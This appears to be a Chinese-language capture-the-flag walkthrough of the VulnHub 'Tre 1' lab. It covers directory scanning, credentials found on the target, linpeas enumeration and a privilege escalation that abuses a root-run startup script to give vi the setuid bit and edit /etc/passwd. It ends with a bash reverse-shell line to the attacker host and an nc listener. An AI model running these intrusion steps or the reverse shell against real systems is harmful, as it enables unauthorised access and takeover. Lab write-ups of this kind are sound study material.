靶场地址:https://www.vulnhub.com/entry/tre-1,483/
桥接模式
kali:192.168.11.110
靶场:192.168.11.114
扫描下网站:dirb http://192.168.11.114/
用笨方法一个个试IP地址,发现这个地址,于是输入ip,发现是一个登录页面,随便输入账号,比如admin、admin,没想到竟然登录成功了,有点不可思议
当我用nikto -h 192.168.11.114扫描的时候也出现了账号
python dirsearch.py -u http://192.168.11.114/
登录后
dirsearch默认字典没扫除其他有用信息,看别人通关原来是字典的原因,利用dirb大字典扫描目录
dirb http://192.168.11.114/ /usr/share/wordlists/dirb/big.txt
一个个试出来的
利用账号进行登录
tre
Tr3@123456A!
tre@localhost
64c4685f8da5c2225de7890c1bad0d7f
进行登录
wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
LinPEAS是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。
该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置。
chmod 777 linpeas.sh
./linpeas.sh -h
开启http服务将脚本传到靶机
python -m http.server 80
靶机执行:wget http://192.168.11.110/linpeas.sh
给权限运行脚本,由于内容比较多输出到一个文件中方便查看
./linpeas.sh > 1.txt
rsync -avz tre@192.168.11.110:/home/tre/1.txt /root/linpeas.txt
-a:保持原属性
-v:详细信息
-z:在传输文件时压缩减少网络带宽占用
对生成的报告文件进行分析
more linpeas.txt
发现存在一条/bin/bash /usr/bin/check-system的进程,是root用户启动的
查看check-system脚本
cat /usr/bin/check-system
不难判断这个一定是开机自启动项,验证一下
ls /etc/systemd/system
cat /etc/systemd/system/check-system.service
提权思路有了:更改这个脚本给vi编辑器s权限,让服务器重启生效,通过vi修改/etc/passwd
利用命令重启
sudo shutdown -r now
进行重启,重新连接
然后再次登录ssh
bash -i >& /dev/tcp/192.168.11.110/1234 0>&1
然后再kali中nc lvnp 1234,就能链接上
然后再重启,让这个语句生效
